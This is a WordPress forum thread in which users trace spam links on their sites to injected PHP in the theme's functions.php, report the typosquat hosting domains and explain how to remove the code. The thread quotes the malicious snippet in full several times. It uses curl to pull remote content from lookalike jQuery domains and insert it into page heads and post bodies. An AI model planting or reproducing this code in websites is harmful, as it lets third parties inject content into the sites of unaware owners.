How to remove Link1 Link2 under post at the frontpage

  • Hi guys, around 2-3 days ago, i suddenly realize that this link appear below my post that when click lead to https://www.link1.com/

    So, how to remove this, it just appear 2-3 days ago and i try google it, but found nothing,

    HOpe someone can help ??

Viewing 15 replies - 1 through 15 (of 17 total)
  • Thread Starter En-lidi

    (@en-lidi)

    this is the printscreen picture

    https://img190.imageshack.us/img190/1730/71342678.jpg

    Thread Starter En-lidi

    (@en-lidi)

    i really need help >_<

    zero web

    (@codrutalexoaiagmailcom)

    same here. Links appeared to show randomly on site, this is the second **it this week, removed some sexy links a few days ago. What is going on?

    zero web

    (@codrutalexoaiagmailcom)

    ok, check your theme “functions.php” for this line of code:

    function ins_php_in_post($content){$percentage = 25;if (rand(0, 100) < $percentage){ob_start();if(function_exists('curl_init')) { $url = "https://www.jquerys.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data"; }$text = ob_get_clean();$pos = rand(0, strlen($content));$txtPrePos = substr($content, 0, $pos);$txtPostPos = substr($content, $pos);$openPos = strrpos($txtPrePos, "<");if ($openPos !== false){$closePos = strrpos($txtPrePos, ">");if ($openPos > $closePos || $closePos === false){$pos = strpos($content, ">", $pos) + 1;}}$spos = strpos($content, " ", $pos);if ($spos === false)	{$spos = strlen($content);}$content = substr($content, 0, $spos) . " " . $text . substr($content, $spos);}return $content;}

    It seems to be another copy cat site from the same smart arses from another problem I have had…so, please be aware of any files-plugins from this guys!

    Thread Starter En-lidi

    (@en-lidi)

    ok, i just check it,

    function ins_php_in_post($content){$percentage = 25;if (rand(0, 100) < $percentage){ob_start();if(function_exists('curl_init')) { $url = "https://www.jquerys.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data"; }$text = ob_get_clean();$pos = rand(0, strlen($content));$txtPrePos = substr($content, 0, $pos);$txtPostPos = substr($content, $pos);$openPos = strrpos($txtPrePos, "<");if ($openPos !== false){$closePos = strrpos($txtPrePos, ">");if ($openPos > $closePos || $closePos === false){$pos = strpos($content, ">", $pos) + 1;}}$spos = strpos($content, " ", $pos);if ($spos === false) {$spos = strlen($content);}$content = substr($content, 0, $spos) . " " . $text . substr($content, $spos);}return $content;}

    Thread Starter En-lidi

    (@en-lidi)

    but… what to do know..i still dont get it ??

    zero web

    (@codrutalexoaiagmailcom)

    Well, just delete the whole line. It is written just for that, to insert links into your pages. I have deleted it and I do not have any more of those links.

    They bought a domain name pretty similar to the original one https://www.jquerys.org (the original one is https://www.jquery.com and https://www.jquery.org), on the index file they have a redirect, so, if you try to get on site, you just get on the “legal” one, if you look into the code lines, the link is pretty similar to the “legal” one… and you just might pass the line without any concerns. The malicious file is hosted on the copycat server, the same with another js file with problems which I think is from the same guys, the https://www.wpstats.org server… What to do with this ones, I do not know, maybe just reporting those domains somewhere…I do not know if this is possible.

    I am manually checking and deleting any code line containing any external link or file to be loaded. Just to be sure.

    zero web

    (@codrutalexoaiagmailcom)

    I have reported both domains to the hosting server (since it is the same for both). Let’ see what will happen.

    thanx for solution i deleted whole functions definition under

    //SET JQUERY FUNCTIONS
    function……

    //////

    and i solved the problem..

    zero web

    (@codrutalexoaiagmailcom)

    see if you have another line with this link in it

    https://www.wpstats.org/jquery-1.6.3.min.js

    This is another script that loads some links, but they are in a hidden div. Check your page source in browser to see if you have a div with some https://www.care2.com links. They are from the same guys. I have reported them to the hosting company and they said that they will contact the owner of the domains…will see.

    Thank you zero web for your kind help……

    Thread Starter En-lidi

    (@en-lidi)

    Hi zero web, soryy for super late reply,

    thanks for your advice, i try to delete it, but got error, and try again and again for many days still the same, the link 1 and link 2 really give me headache,

    So my last solution is change the theme,hope the link doesnt appear again -_____-

    zero web

    (@codrutalexoaiagmailcom)

    No problem Jansha, hope this will help other guys that have this problem.

    En-lidi, what error do you have?

    try to edit the file, search for this lines:

    if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "https://www.wpstats.org/jquery-1.6.3.min.js";$ch = curl_init();	$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}
function ins_php_in_post($content){$percentage = 25;if (rand(0, 100) < $percentage){ob_start();if(function_exists('curl_init')) { $url = "https://www.jquerys.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data"; }$text = ob_get_clean();$pos = rand(0, strlen($content));$txtPrePos = substr($content, 0, $pos);$txtPostPos = substr($content, $pos);$openPos = strrpos($txtPrePos, "<");if ($openPos !== false){$closePos = strrpos($txtPrePos, ">");if ($openPos > $closePos || $closePos === false){$pos = strpos($content, ">", $pos) + 1;}}$spos = strpos($content, " ", $pos);if ($spos === false)	{$spos = strlen($content);}$content = substr($content, 0, $spos) . " " . $text . substr($content, $spos);}return $content;}
add_filter('the_content', 'ins_php_in_post');

    and delete them. Save the file, and you are done. If you are editing your functions.php by ftp, do not forget to re-upload the edited file. If nothing works or you need some help, you can try and put the whole code from functions.php file here, and I will delete those lines and paste the new code, all you will have to do then is to copy/paste over the whole code from you file. Save-upload…

    The hosting company for those guys have done nothing about them, the files are still there… wouldn’t be a surprise that the hosting guys are the the same guys with the ones that have placed the malicious file there.

    zero web

    (@codrutalexoaiagmailcom)

    Well, we made it. Those accounts are disabled now, the hosting company did it’s part.

    We will keep an eye on this guys.

    Thank you guys you solved my problem ?? :thumbup:

Viewing 15 replies - 1 through 15 (of 17 total)
  • The topic ‘How to remove Link1 Link2 under post at the frontpage’ is closed to new replies.